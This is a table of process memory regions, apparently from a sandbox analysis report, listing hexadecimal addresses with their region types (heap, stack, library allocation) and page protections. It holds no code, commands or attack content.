trusted library allocation
|
page read and write
|
||
A3551FE000
|
stack
|
page read and write
|
||
2A00000
|
direct allocation
|
page read and write
|
||
7FFD9AD14000
|
trusted library allocation
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
2625EAFB000
|
heap
|
page read and write
|
||
7FFD9B060000
|
trusted library allocation
|
page read and write
|
||
2D8F6648000
|
heap
|
page read and write
|
||
19CBBB56000
|
heap
|
page read and write
|
||
219001C0000
|
heap
|
page execute and read and write
|
||
2D8F6350000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9AFC0000
|
trusted library allocation
|
page read and write
|
||
2D8F6644000
|
heap
|
page read and write
|
||
26D6AFF000
|
unkown
|
page read and write
|
||
7FF634269000
|
unkown
|
page read and write
|
||
A40000
|
heap
|
page read and write
|
||
1E002500000
|
heap
|
page execute and read and write
|
||
2D8F6468000
|
heap
|
page read and write
|
||
7FFDFB628000
|
unkown
|
page execute and read and write
|
||
290CCFC000
|
stack
|
page read and write
|
||
2191869B000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
7FFE01477000
|
unkown
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
21918902000
|
heap
|
page read and write
|
||
21015040000
|
heap
|
page read and write
|
||
2D199F40000
|
heap
|
page read and write
|
||
2D8F665F000
|
heap
|
page read and write
|
||
7FFD9AD10000
|
trusted library allocation
|
page read and write
|
||
2D8F64D5000
|
heap
|
page read and write
|
||
2D8F5D86000
|
heap
|
page read and write
|
||
282B62B1000
|
heap
|
page read and write
|
||
2E4A9A7B000
|
heap
|
page read and write
|
||
2197E100000
|
heap
|
page read and write
|
||
2D8F64DA000
|
heap
|
page read and write
|
||
256F2A90000
|
heap
|
page read and write
|
||
1B091960000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
12140000
|
trusted library allocation
|
page read and write
|
||
4C2D876000
|
stack
|
page read and write
|
||
7FFE0145C000
|
unkown
|
page execute and read and write
|
||
2D8F6483000
|
heap
|
page read and write
|
||
DD6000
|
heap
|
page read and write
|
||
1A6018BF000
|
heap
|
page read and write
|
||
2D8F6F6C000
|
heap
|
page read and write
|
||
2D8F6408000
|
heap
|
page read and write
|
||
7FFE10300000
|
unkown
|
page readonly
|
||
2D8F72D8000
|
direct allocation
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
181AD670000
|
heap
|
page read and write
|
||
2D8F3C2F000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F3C60000
|
heap
|
page read and write
|
||
2D8F649C000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F6638000
|
heap
|
page read and write
|
||
2D8F5E41000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F3C54000
|
heap
|
page read and write
|
||
13DF6C61000
|
heap
|
page read and write
|
||
F7F87F000
|
stack
|
page read and write
|
||
2D8F6478000
|
heap
|
page read and write
|
||
167E7FD0000
|
heap
|
page read and write
|
||
23DAA190000
|
heap
|
page read and write
|
||
282ACFAA000
|
heap
|
page read and write
|
||
181AD7F1000
|
heap
|
page read and write
|
||
F0263FF000
|
stack
|
page read and write
|
||
2197EBA0000
|
heap
|
page read and write
|
||
266C28D0000
|
heap
|
page read and write
|
||
2D8F6634000
|
heap
|
page read and write
|
||
E3D2BFE000
|
unkown
|
page read and write
|
||
B5322FE000
|
stack
|
page read and write
|
||
21645920000
|
heap
|
page read and write
|
||
2D8F64AE000
|
heap
|
page read and write
|
||
A10000
|
heap
|
page read and write
|
||
21E8EEA6000
|
heap
|
page read and write
|
||
7FF771DB1000
|
unkown
|
page execute read
|
||
2E4A9A8D000
|
heap
|
page read and write
|
||
1FE98320000
|
heap
|
page read and write
|
||
2D8F64EF000
|
heap
|
page read and write
|
||
3039DFF000
|
stack
|
page read and write
|
||
19CBBB6C000
|
heap
|
page read and write
|
||
20DBCD50000
|
heap
|
page read and write
|
||
B5326BE000
|
stack
|
page read and write
|
||
23A0FE70000
|
heap
|
page read and write
|
||
7FFE13321000
|
unkown
|
page execute and write copy
|
||
B531DC3000
|
stack
|
page read and write
|
||
12140000
|
trusted library allocation
|
page read and write
|
||
7FFE1031C000
|
unkown
|
page execute and write copy
|
||
21901FBE000
|
trusted library allocation
|
page read and write
|
||
266C2B64000
|
heap
|
page read and write
|
||
7FF771DBA000
|
unkown
|
page readonly
|
||
69F000
|
unkown
|
page readonly
|
||
23DAA280000
|
heap
|
page read and write
|
||
21EE5BD0000
|
heap
|
page read and write
|
||
140000000
|
unkown
|
page read and write
|
||
21900F21000
|
trusted library allocation
|
page read and write
|
||
F0EA3BF000
|
stack
|
page read and write
|
||
780000
|
heap
|
page read and write
|
||
2D8F6472000
|
heap
|
page read and write
|
||
2D8F64CA000
|
heap
|
page read and write
|
||
28A222E4000
|
heap
|
page read and write
|
||
19CBC281000
|
heap
|
page read and write
|
||
17A51519000
|
heap
|
page read and write
|
||
19DCB061000
|
heap
|
page read and write
|
||
2D8F64CA000
|
heap
|
page read and write
|
||
236FE210000
|
unkown
|
page read and write
|
||
EA0000
|
heap
|
page read and write
|
||
A6E000
|
heap
|
page read and write
|
||
85445DC000
|
stack
|
page read and write
|
||
2D8F64C2000
|
heap
|
page read and write
|
||
2D8F646C000
|
heap
|
page read and write
|
||
266C2AB0000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
1C34C450000
|
unkown
|
page read and write
|
||
B532638000
|
stack
|
page read and write
|
||
221566C0000
|
heap
|
page read and write
|
||
2E4A9A8D000
|
heap
|
page read and write
|
||
2B7E000
|
stack
|
page read and write
|
||
7FF623FB4000
|
unkown
|
page readonly
|
||
2D8F64E7000
|
heap
|
page read and write
|
||
2D8F5D9E000
|
heap
|
page read and write
|
||
12A1000
|
heap
|
page read and write
|
||
28A222F0000
|
heap
|
page read and write
|
||
2D8F6658000
|
heap
|
page read and write
|
||
7FFD9B058000
|
trusted library allocation
|
page read and write
|
||
2D8F6658000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
1E012B8C000
|
trusted library allocation
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F6C0D000
|
heap
|
page read and write
|
||
2D8F5E51000
|
heap
|
page read and write
|
||
17A51430000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9AED8000
|
trusted library allocation
|
page read and write
|
||
2E4A9A8D000
|
heap
|
page read and write
|
||
2D8F64D1000
|
heap
|
page read and write
|
||
21E8F057000
|
heap
|
page read and write
|
||
2D8F3C60000
|
heap
|
page read and write
|
||
2D8F3C5E000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
20DBCC70000
|
heap
|
page read and write
|
||
181AD805000
|
heap
|
page read and write
|
||
2D8F5DA0000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
2D8F60B5000
|
heap
|
page read and write
|
||
2D8F6641000
|
heap
|
page read and write
|
||
2D8F7374000
|
heap
|
page read and write
|
||
1E01AD60000
|
heap
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
24310E00000
|
heap
|
page read and write
|
||
1FE98300000
|
heap
|
page read and write
|
||
7FFDFAEE1000
|
unkown
|
page execute and read and write
|
||
181AD7C1000
|
heap
|
page read and write
|
||
2D8F647D000
|
heap
|
page read and write
|
||
2D8F64A4000
|
heap
|
page read and write
|
||
2D8F6443000
|
heap
|
page read and write
|
||
2D8F3C86000
|
heap
|
page read and write
|
||
2D8F64C6000
|
heap
|
page read and write
|
||
1A6018C1000
|
heap
|
page read and write
|
||
2D8F64A6000
|
heap
|
page read and write
|
||
1E000A40000
|
heap
|
page read and write
|
||
19DCB061000
|
heap
|
page read and write
|
||
2E4A9A55000
|
heap
|
page read and write
|
||
7FFD9AF30000
|
trusted library allocation
|
page read and write
|
||
2D8F647F000
|
heap
|
page read and write
|
||
2D8F613F000
|
heap
|
page read and write
|
||
1D50000
|
heap
|
page read and write
|
||
181B0BE0000
|
direct allocation
|
page read and write
|
||
19DCB061000
|
heap
|
page read and write
|
||
21645ACB000
|
heap
|
page read and write
|
||
7FFDFB739000
|
unkown
|
page execute and read and write
|
||
83D6EFB000
|
stack
|
page read and write
|
||
2D8F5E51000
|
heap
|
page read and write
|
||
2D8F5E6B000
|
heap
|
page read and write
|
||
21EE58BB000
|
heap
|
page read and write
|
||
2D8F647F000
|
heap
|
page read and write
|
||
2E4A9A80000
|
heap
|
page read and write
|
||
7FFE126F3000
|
unkown
|
page execute and read and write
|
||
2D8F64C6000
|
heap
|
page read and write
|
||
12140000
|
trusted library allocation
|
page read and write
|
||
2E4A9A88000
|
heap
|
page read and write
|
||
2D8F5DD2000
|
heap
|
page read and write
|
||
181AD984000
|
heap
|
page read and write
|
||
2D8F6453000
|
heap
|
page read and write
|
||
340997E000
|
stack
|
page read and write
|
||
2D8F646F000
|
heap
|
page read and write
|
||
1DC70D90000
|
heap
|
page read and write
|
||
1A6018C6000
|
heap
|
page read and write
|
||
181B0D52000
|
direct allocation
|
page read and write
|
||
2D8F5E51000
|
heap
|
page read and write
|
||
2D8F6408000
|
heap
|
page read and write
|
||
1F52EDD0000
|
heap
|
page read and write
|
||
181AD81D000
|
heap
|
page read and write
|
||
286A51C0000
|
heap
|
page read and write
|
||
2D8F5DF5000
|
heap
|
page read and write
|
||
286A5555000
|
heap
|
page read and write
|
||
7FFE10262000
|
unkown
|
page execute and read and write
|
||
D37000
|
stack
|
page read and write
|
||
1E01AC41000
|
heap
|
page read and write
|
||
181AD7AA000
|
heap
|
page read and write
|
||
7FFDFB1F0000
|
unkown
|
page execute and read and write
|
||
2D8F3C84000
|
heap
|
page read and write
|
||
7FFDFAFAD000
|
unkown
|
page execute and read and write
|
||
7FFE10242000
|
unkown
|
page execute and write copy
|
||
19A000
|
stack
|
page read and write
|
||
AAA76FF000
|
stack
|
page read and write
|
||
2197E1C6000
|
heap
|
page read and write
|
||
282B6290000
|
heap
|
page read and write
|
||
7FF623F70000
|
unkown
|
page readonly
|
||
181AD7CC000
|
heap
|
page read and write
|
||
2E4A9A8D000
|
heap
|
page read and write
|
||
1F72ED51000
|
heap
|
page read and write
|
||
1D0E000
|
stack
|
page read and write
|
||
1DC70E51000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
2D8F5D81000
|
heap
|
page read and write
|
||
27CC3735000
|
heap
|
page read and write
|
||
12B9000
|
heap
|
page read and write
|
||
1A6018A3000
|
heap
|
page read and write
|
||
20DBCB93000
|
heap
|
page read and write
|
||
2E4A9A8B000
|
heap
|
page read and write
|
||
7FFD9ADA0000
|
trusted library allocation
|
page read and write
|
||
2D8F63B1000
|
heap
|
page read and write
|
||
E3D2AFC000
|
stack
|
page read and write
|
||
19CBBDBE000
|
heap
|
page read and write
|
||
B5327BC000
|
stack
|
page read and write
|
||
2D8F6498000
|
heap
|
page read and write
|
||
2D8F65FA000
|
heap
|
page read and write
|
||
7FFE11511000
|
unkown
|
page execute and read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
2D8F3C86000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
970000
|
unkown
|
page readonly
|
||
2D8F64AE000
|
heap
|
page read and write
|
||
27CC37AB000
|
heap
|
page read and write
|
||
2D8F6093000
|
heap
|
page read and write
|
||
20871220000
|
heap
|
page read and write
|
||
2D8F64A6000
|
heap
|
page read and write
|
||
2197E3C0000
|
heap
|
page read and write
|
||
2D8F662A000
|
heap
|
page read and write
|
||
196D8991000
|
heap
|
page read and write
|
||
7FFDFB2C6000
|
unkown
|
page execute and read and write
|
||
2D8F60C9000
|
heap
|
page read and write
|
||
13DF6EB0000
|
heap
|
page read and write
|
||
2D8F6472000
|
heap
|
page read and write
|
||
7FFD9AF90000
|
trusted library allocation
|
page read and write
|
||
2D8F63B4000
|
heap
|
page read and write
|
||
12B0000
|
heap
|
page read and write
|
||
2197E9E0000
|
heap
|
page read and write
|
||
1E002FD7000
|
trusted library allocation
|
page read and write
|
||
2D8F3CA2000
|
heap
|
page read and write
|
||
215A32DE000
|
heap
|
page read and write
|
||
2D199C00000
|
heap
|
page read and write
|
||
282B62A9000
|
heap
|
page read and write
|
||
2D8F64CA000
|
heap
|
page read and write
|
||
2D8F3C5A000
|
heap
|
page read and write
|
||
2D8F6460000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
364DFD000
|
stack
|
page read and write
|
||
181AD7C3000
|
heap
|
page read and write
|
||
235B3110000
|
heap
|
page read and write
|
||
295324F0000
|
heap
|
page read and write
|
||
7FFD9AEA1000
|
trusted library allocation
|
page read and write
|
||
2625EB10000
|
heap
|
page read and write
|
||
1A601AA4000
|
heap
|
page read and write
|
||
102EFF000
|
unkown
|
page read and write
|
||
219000B0000
|
heap
|
page read and write
|
||
2D8F64E6000
|
heap
|
page read and write
|
||
21645AD2000
|
heap
|
page read and write
|
||
7FFD9AD1B000
|
trusted library allocation
|
page execute and read and write
|
||
19CBDB40000
|
heap
|
page read and write
|
||
2D8F6447000
|
heap
|
page read and write
|
||
7FFD9AE10000
|
trusted library allocation
|
page execute and read and write
|
||
21E8EE40000
|
heap
|
page read and write
|
||
2D8F3D80000
|
heap
|
page read and write
|
||
21E8EEA0000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
9CFF67F000
|
stack
|
page read and write
|
||
B53338B000
|
stack
|
page read and write
|
||
19CBC28E000
|
heap
|
page read and write
|
||
21910201000
|
trusted library allocation
|
page read and write
|
||
2D8F6638000
|
heap
|
page read and write
|
||
84175FF000
|
unkown
|
page read and write
|
||
F22AFDC000
|
stack
|
page read and write
|
||
20CA0738000
|
heap
|
page read and write
|
||
181AD7AC000
|
heap
|
page read and write
|
||
282B6250000
|
heap
|
page read and write
|
||
85449FF000
|
stack
|
page read and write
|
||
21645AC6000
|
heap
|
page read and write
|
||
181AD7A8000
|
heap
|
page read and write
|
||
EAE287F000
|
stack
|
page read and write
|
||
19CBBB48000
|
heap
|
page read and write
|
||
2D8F64DA000
|
heap
|
page read and write
|
||
2D8F6351000
|
heap
|
page read and write
|
||
19CBBD10000
|
heap
|
page read and write
|
||
1F52EEA8000
|
heap
|
page read and write
|
||
1F72EC80000
|
heap
|
page read and write
|
||
1E012B21000
|
trusted library allocation
|
page read and write
|
||
2D8F5E41000
|
heap
|
page read and write
|
||
19CBDB54000
|
heap
|
page read and write
|
||
2E4A9A5B000
|
heap
|
page read and write
|
||
21918A55000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B080000
|
trusted library allocation
|
page read and write
|
||
181B0D80000
|
direct allocation
|
page read and write
|
||
1E01AD04000
|
heap
|
page read and write
|
||
7FF771DBA000
|
unkown
|
page readonly
|
||
7FFE0EB41000
|
unkown
|
page execute and read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
196D8991000
|
heap
|
page read and write
|
||
2D8F64CD000
|
heap
|
page read and write
|
||
1A6018A4000
|
heap
|
page read and write
|
||
219006AF000
|
trusted library allocation
|
page read and write
|
||
256E8B31000
|
heap
|
page read and write
|
||
7FF623FAE000
|
unkown
|
page read and write
|
||
20871370000
|
heap
|
page read and write
|
||
181AD7A0000
|
heap
|
page read and write
|
||
2197E901000
|
heap
|
page read and write
|
||
27CC37C0000
|
heap
|
page read and write
|
||
48C60FE000
|
stack
|
page read and write
|
||
2D8F3C43000
|
heap
|
page read and write
|
||
19CBDB4D000
|
heap
|
page read and write
|
||
181AD9F4000
|
heap
|
page read and write
|
||
19CBBB63000
|
heap
|
page read and write
|
||
2D8F5DD0000
|
heap
|
page read and write
|
||
2D8F3C89000
|
heap
|
page read and write
|
||
181AD79B000
|
heap
|
page read and write
|
||
7FFE10244000
|
unkown
|
page read and write
|
||
2D8F5E51000
|
heap
|
page read and write
|
||
7FFD9B05C000
|
trusted library allocation
|
page read and write
|
||
1F52EDF0000
|
heap
|
page read and write
|
||
5290000
|
trusted library allocation
|
page read and write
|
||
12140000
|
trusted library allocation
|
page read and write
|
||
7FFDFB1EE000
|
unkown
|
page execute and read and write
|
||
4C2D7F8000
|
stack
|
page read and write
|
||
FA0000
|
heap
|
page read and write
|
||
2E4A9DD4000
|
heap
|
page read and write
|
||
2D8F667C000
|
heap
|
page read and write
|
||
34095EE000
|
stack
|
page read and write
|
||
21918A59000
|
heap
|
page read and write
|
||
278960B0000
|
heap
|
page read and write
|
||
1A601A60000
|
heap
|
page read and write
|
||
2D8F64C4000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F64A4000
|
heap
|
page read and write
|
||
19CBBB46000
|
heap
|
page read and write
|
||
20CA0A64000
|
heap
|
page read and write
|
||
2D199CC1000
|
heap
|
page read and write
|
||
2D8F72F8000
|
direct allocation
|
page read and write
|
||
E43000
|
trusted library allocation
|
page read and write
|
||
7FFD9AE92000
|
trusted library allocation
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F6678000
|
heap
|
page read and write
|
||
26531980000
|
heap
|
page read and write
|
||
2D8F6E1D000
|
heap
|
page read and write
|
||
181B0DED000
|
direct allocation
|
page read and write
|
||
7FF623FB2000
|
unkown
|
page read and write
|
||
1D88000
|
heap
|
page read and write
|
||
2D8F6A0C000
|
direct allocation
|
page read and write
|
||
181AD769000
|
heap
|
page read and write
|
||
2D8F649A000
|
heap
|
page read and write
|
||
2191893C000
|
heap
|
page read and write
|
||
2D8F6648000
|
heap
|
page read and write
|
||
21918912000
|
heap
|
page read and write
|
||
C0F000
|
stack
|
page read and write
|
||
20DBCB99000
|
heap
|
page read and write
|
||
7A6D57C000
|
stack
|
page read and write
|
||
19CBBB27000
|
heap
|
page read and write
|
||
19DCB06D000
|
heap
|
page read and write
|
||
19DCB061000
|
heap
|
page read and write
|
||
19CBC29C000
|
heap
|
page read and write
|
||
9B000
|
stack
|
page read and write
|
||
1E000A86000
|
heap
|
page read and write
|
||
2D8F6466000
|
heap
|
page read and write
|
||
1D920780000
|
heap
|
page read and write
|
||
21E8EE96000
|
heap
|
page read and write
|
||
7FFD9AFB0000
|
trusted library allocation
|
page read and write
|
||
13DF6C61000
|
heap
|
page read and write
|
||
20DBCBB8000
|
heap
|
page read and write
|
||
20DBCBBB000
|
heap
|
page read and write
|
||
1C378800000
|
heap
|
page read and write
|
||
2D8F64C1000
|
heap
|
page read and write
|
||
E448AFF000
|
stack
|
page read and write
|
||
E67000
|
trusted library allocation
|
page execute and read and write
|
||
2D8F63F6000
|
heap
|
page read and write
|
||
7FFDFA225000
|
unkown
|
page execute and write copy
|
||
2E4A9A7B000
|
heap
|
page read and write
|
||
2D8F6AB0000
|
direct allocation
|
page read and write
|
||
2D8F64AE000
|
heap
|
page read and write
|
||
7FFD9AF80000
|
trusted library allocation
|
page read and write
|
||
2D8F64C6000
|
heap
|
page read and write
|
||
215A32DC000
|
heap
|
page read and write
|
||
2D8F6AB4000
|
direct allocation
|
page read and write
|
||
27CC3650000
|
heap
|
page read and write
|
||
219188FA000
|
heap
|
page read and write
|
||
17A51521000
|
heap
|
page read and write
|
||
19DCB061000
|
heap
|
page read and write
|
||
181AD783000
|
heap
|
page read and write
|
||
19CBC299000
|
heap
|
page read and write
|
||
2D8F60D9000
|
heap
|
page read and write
|
||
1D920600000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
B98FEFF000
|
unkown
|
page read and write
|
||
20DBCBB8000
|
heap
|
page read and write
|
||
7FFE1031E000
|
unkown
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
278CA860000
|
heap
|
page read and write
|
||
2D8F64F1000
|
heap
|
page read and write
|
||
21015320000
|
heap
|
page read and write
|
||
7FFD9AD1D000
|
trusted library allocation
|
page execute and read and write
|
||
17A51521000
|
heap
|
page read and write
|
||
77BF1FE000
|
stack
|
page read and write
|
||
2197E23E000
|
heap
|
page read and write
|
||
2D8F640A000
|
heap
|
page read and write
|
||
21918906000
|
heap
|
page read and write
|
||
181AD78B000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
2070D390000
|
heap
|
page read and write
|
||
219001E1000
|
trusted library allocation
|
page read and write
|
||
2625EB10000
|
heap
|
page read and write
|
||
256E8A70000
|
heap
|
page read and write
|
||
221565C0000
|
heap
|
page read and write
|
||
2D8F6474000
|
heap
|
page read and write
|
||
215A32AB000
|
heap
|
page read and write
|
||
7FFDFA174000
|
unkown
|
page execute and read and write
|
||
181B0C80000
|
direct allocation
|
page read and write
|
||
282ACE60000
|
heap
|
page read and write
|
||
2087112B000
|
heap
|
page read and write
|
||
2D8F3BF0000
|
heap
|
page read and write
|
||
181AD813000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F63F8000
|
heap
|
page read and write
|
||
181AD940000
|
direct allocation
|
page read and write
|
||
2497000
|
heap
|
page read and write
|
||
FD8F6FE000
|
stack
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9ACF4000
|
trusted library allocation
|
page read and write
|
||
219188A0000
|
heap
|
page execute and read and write
|
||
E448A7C000
|
stack
|
page read and write
|
||
2D8F64C2000
|
heap
|
page read and write
|
||
402000
|
unkown
|
page readonly
|
||
14FE000
|
stack
|
page read and write
|
||
2C4E000
|
stack
|
page read and write
|
||
2D8F661E000
|
heap
|
page read and write
|
||
1E000A7D000
|
heap
|
page read and write
|
||
1E002452000
|
trusted library allocation
|
page read and write
|
||
2D8F6381000
|
heap
|
page read and write
|
||
19CBC299000
|
heap
|
page read and write
|
||
2D8F6407000
|
heap
|
page read and write
|
||
7DF4D7610000
|
trusted library allocation
|
page execute and read and write
|
||
2D8F64C1000
|
heap
|
page read and write
|
||
2D8F6647000
|
heap
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
1E000AB3000
|
heap
|
page read and write
|
||
181AD7E9000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
FD8F4FF000
|
stack
|
page read and write
|
||
19CBDB46000
|
heap
|
page read and write
|
||
2D8F3C33000
|
heap
|
page read and write
|
||
19CBBB8F000
|
heap
|
page read and write
|
||
7FF633FEC000
|
unkown
|
page write copy
|
||
2D8F3C60000
|
heap
|
page read and write
|
||
7FFD9AF60000
|
trusted library allocation
|
page read and write
|
||
19CBC270000
|
heap
|
page read and write
|
||
2D8F72E8000
|
direct allocation
|
page read and write
|
||
181B0DC0000
|
direct allocation
|
page read and write
|
||
A1E000
|
heap
|
page read and write
|
||
1316000
|
heap
|
page read and write
|
||
7FF633FE1000
|
unkown
|
page execute read
|
||
310F000
|
stack
|
page read and write
|
||
2D8F5E41000
|
heap
|
page read and write
|
||
286A51A0000
|
heap
|
page read and write
|
||
19DCB048000
|
heap
|
page read and write
|
||
21901965000
|
trusted library allocation
|
page read and write
|
||
21918678000
|
heap
|
page read and write
|
||
2E4A9A82000
|
heap
|
page read and write
|
||
2D8F3C86000
|
heap
|
page read and write
|
||
2D8F63B4000
|
heap
|
page read and write
|
||
F7F56F000
|
stack
|
page read and write
|
||
19CBDB54000
|
heap
|
page read and write
|
||
7FFD9AD0D000
|
trusted library allocation
|
page execute and read and write
|
||
215A3280000
|
heap
|
page read and write
|
||
EF992FF000
|
unkown
|
page read and write
|
||
1C378740000
|
heap
|
page read and write
|
||
2D8F3BB0000
|
heap
|
page read and write
|
||
27CC3734000
|
heap
|
page read and write
|
||
1A49C1B0000
|
heap
|
page read and write
|
||
19DCAFA0000
|
heap
|
page read and write
|
||
7FFD9AD4C000
|
trusted library allocation
|
page execute and read and write
|
||
2D8F3C94000
|
heap
|
page read and write
|
||
181AD7D3000
|
heap
|
page read and write
|
||
2D8F65FA000
|
heap
|
page read and write
|
||
20DBCE40000
|
heap
|
page read and write
|
||
2D8F6B4F000
|
heap
|
page read and write
|
||
2D8F64D8000
|
heap
|
page read and write
|
||
2D8F64C2000
|
heap
|
page read and write
|
||
21645ACB000
|
heap
|
page read and write
|
||
19CBC27F000
|
heap
|
page read and write
|
||
2D8F637E000
|
heap
|
page read and write
|
||
1D920924000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
2D8F65FA000
|
heap
|
page read and write
|
||
29532500000
|
heap
|
page read and write
|
||
2D8F63D4000
|
heap
|
page read and write
|
||
7FFD9AFD0000
|
trusted library allocation
|
page read and write
|
||
2D8F6677000
|
heap
|
page read and write
|
||
1DC711E5000
|
heap
|
page read and write
|
||
17A5150B000
|
heap
|
page read and write
|
||
1A49C391000
|
heap
|
page read and write
|
||
21645ACB000
|
heap
|
page read and write
|
||
2D8F64B6000
|
heap
|
page read and write
|
||
2D8F63AE000
|
heap
|
page read and write
|
||
19CBC285000
|
heap
|
page read and write
|
||
7FFD9AFA0000
|
trusted library allocation
|
page read and write
|
||
21645ADC000
|
heap
|
page read and write
|
||
375E2FB000
|
stack
|
page read and write
|
||
1F72F0A0000
|
heap
|
page read and write
|
||
215A3240000
|
heap
|
page read and write
|
||
23D52D04000
|
heap
|
page read and write
|
||
17A51460000
|
heap
|
page read and write
|
||
2D8F5E80000
|
direct allocation
|
page read and write
|
||
7FFD9AD04000
|
trusted library allocation
|
page read and write
|
||
17A51440000
|
heap
|
page read and write
|
||
2D8F3C86000
|
heap
|
page read and write
|
||
7FFDFB2F8000
|
unkown
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
16A0000
|
trusted library allocation
|
page read and write
|
||
2D8F68A0000
|
direct allocation
|
page read and write
|
||
7FFE0EB6B000
|
unkown
|
page execute and write copy
|
||
28A22150000
|
heap
|
page read and write
|
||
2E4A9A8D000
|
heap
|
page read and write
|
||
1E01AD42000
|
heap
|
page read and write
|
||
2D8F3C5E000
|
heap
|
page read and write
|
||
1A6018C5000
|
heap
|
page read and write
|
||
2D8F64C6000
|
heap
|
page read and write
|
||
3651FF000
|
stack
|
page read and write
|
||
2D8F63B4000
|
heap
|
page read and write
|
||
2625EE75000
|
heap
|
page read and write
|
||
2D8F64B8000
|
heap
|
page read and write
|
||
2D8F6619000
|
heap
|
page read and write
|
||
7FFD9AEE0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE10251000
|
unkown
|
page execute and read and write
|
||
2D8F60F7000
|
heap
|
page read and write
|
||
266C2B60000
|
heap
|
page read and write
|
||
181AD7B2000
|
heap
|
page read and write
|
||
2197FD24000
|
heap
|
page read and write
|
||
181AD79E000
|
heap
|
page read and write
|
||
19CBBB79000
|
heap
|
page read and write
|
||
21901561000
|
trusted library allocation
|
page read and write
|
||
1B091A00000
|
heap
|
page read and write
|
||
2D8F63E0000
|
heap
|
page read and write
|
||
2D8F6640000
|
heap
|
page read and write
|
||
2D8F64F1000
|
heap
|
page read and write
|
||
2D8F647C000
|
heap
|
page read and write
|
||
51A0000
|
trusted library allocation
|
page read and write
|
||
215A32DC000
|
heap
|
page read and write
|
||
215A3160000
|
heap
|
page read and write
|
||
1DC70E49000
|
heap
|
page read and write
|
||
2E4A9A67000
|
heap
|
page read and write
|
||
7FFE10250000
|
unkown
|
page readonly
|
||
2F7F4FF000
|
stack
|
page read and write
|
||
2D8F5E54000
|
heap
|
page read and write
|
||
5195000
|
trusted library allocation
|
page read and write
|
||
19CBBB77000
|
heap
|
page read and write
|
||
21014FE0000
|
heap
|
page read and write
|
||
2197EBA4000
|
heap
|
page read and write
|
||
1E002AF0000
|
heap
|
page execute and read and write
|
||
7FFDFAF93000
|
unkown
|
page read and write
|
||
A7B000
|
heap
|
page read and write
|
||
2D8F6081000
|
heap
|
page read and write
|
||
2E8F000
|
stack
|
page read and write
|
||
2D8F5DCD000
|
heap
|
page read and write
|
||
19CBBDB7000
|
heap
|
page read and write
|
||
121C0000
|
trusted library allocation
|
page read and write
|
||
2D8F64BE000
|
heap
|
page read and write
|
||
EE1000
|
heap
|
page read and write
|
||
2D8F64CA000
|
heap
|
page read and write
|
||
7FF633FE0000
|
unkown
|
page readonly
|
||
77BEDDD000
|
stack
|
page read and write
|
||
2D8F3C5E000
|
heap
|
page read and write
|
||
181AD880000
|
heap
|
page read and write
|
||
FD8F57F000
|
stack
|
page read and write
|
||
21918B40000
|
heap
|
page read and write
|
||
2D8F3BC0000
|
heap
|
page read and write
|
||
2D8F6472000
|
heap
|
page read and write
|
||
2D8F6631000
|
heap
|
page read and write
|
||
EF98F6C000
|
stack
|
page read and write
|
||
C60097E000
|
stack
|
page read and write
|
||
2E4A9A7B000
|
heap
|
page read and write
|
||
2D8F63B4000
|
heap
|
page read and write
|
||
2D8F64C4000
|
heap
|
page read and write
|
||
4C2E5CD000
|
stack
|
page read and write
|
||
12140000
|
trusted library allocation
|
page read and write
|
||
7FFE130CC000
|
unkown
|
page read and write
|
||
7FFD9AF00000
|
trusted library allocation
|
page read and write
|
||
12140000
|
trusted library allocation
|
page read and write
|
||
2D8F6246000
|
heap
|
page read and write
|
||
21447390000
|
heap
|
page read and write
|
||
181AD7CD000
|
heap
|
page read and write
|
||
7FFDFB21B000
|
unkown
|
page execute and read and write
|
||
2D8F3C62000
|
heap
|
page read and write
|
||
AF3897E000
|
stack
|
page read and write
|
||
219104D3000
|
trusted library allocation
|
page read and write
|
||
2D8F63DA000
|
heap
|
page read and write
|
||
